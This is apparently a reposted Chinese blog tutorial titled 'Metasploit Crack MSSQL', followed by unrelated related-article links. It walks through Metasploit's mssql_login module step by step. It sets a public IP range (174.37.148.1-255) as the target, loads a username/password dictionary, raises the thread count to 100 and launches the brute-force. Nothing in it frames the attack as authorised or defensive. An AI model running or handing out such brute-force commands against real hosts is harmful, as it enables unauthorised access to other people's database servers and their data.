Metasploit Crack MSSQL

简介:
msf > use auxiliary/scanner/mssql/mssql_login   //进入模块
 
msf auxiliary(mssql_login) > show options    //查看信息  YES的是必须填写的
 
Module options:
 
   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             yes       Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             1433             yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME          sa               no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
 
msf auxiliary(mssql_login) > set RHOSTS 174.37.148.1-255    //写入IP
RHOSTS => 174.37.148.1-255
msf auxiliary(mssql_login) > set USERPASS_FILE /1.txt         //写入字典
USERPASS_FILE => /1.txt
msf auxiliary(mssql_login) > set THREADS 100            //写入线程
THREADS => 100
msf auxiliary(mssql_login) > exploit                         //运行

















本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/458340 ,如需转载请自行联系原作者
相关文章
|
测试技术
Win系统 - Microsoft Office 安装出现 1935 错误解决办法
Win系统 - Microsoft Office 安装出现 1935 错误解决办法
447 0
Win系统 - Microsoft Office 安装出现 1935 错误解决办法
|
SQL 安全 关系型数据库
windows_xampp_dvwa-环境搭建
windows_xampp_dvwa-环境搭建
windows_xampp_dvwa-环境搭建
|
关系型数据库 MySQL 数据库
Windows下安装Redmine
参考链接:http://www.cnblogs.com/afarmer/archive/2011/08/06/2129126.html  最新教程:http://www.myexception.cn/windows/1219064.html   工作中学的东西很实用,Redmine就是公司使用的项目管理平台。
2096 0
|
关系型数据库 MySQL C语言
mysql客户端的Windows C/C++编程实现(★firecat推荐★)
mysql客户端的Windows C/C++编程实现(★firecat推荐★)
240 0
|
Python Windows
Windows下SQLMAP的安装图解
由于SQLMap是利用Python语言写的,所以需要将Python这个语言环境给安装上,以下是详细安装过程:   准备工作: (1) Windows7/8/10操作系统; (2) Python2.7.11; (3) SQLMap   Step1.
1135 0
|
程序员
dokuwiki安装问题
工作了几年,虽然在程序员这个道路上才算开始,希望以后能够有所成长,为了把平时遇到的技术问题,记录下来,第一个想到的就是写wiki,博客虽然创建了许久,但是没有坚持写下去,在网上找了许多的wiki程序,dokuwiki是最符合的。
1972 0
|
关系型数据库 PHP Apache
Win 10 下安装DVWA
安装laragon :https://www.laragon.org/download/ 下载 DVWA: 方法1:https://github.com/ethicalhack3r/DVWA.git 克隆到laragon的www即根目录下。
1264 0
|
SQL 网络协议 关系型数据库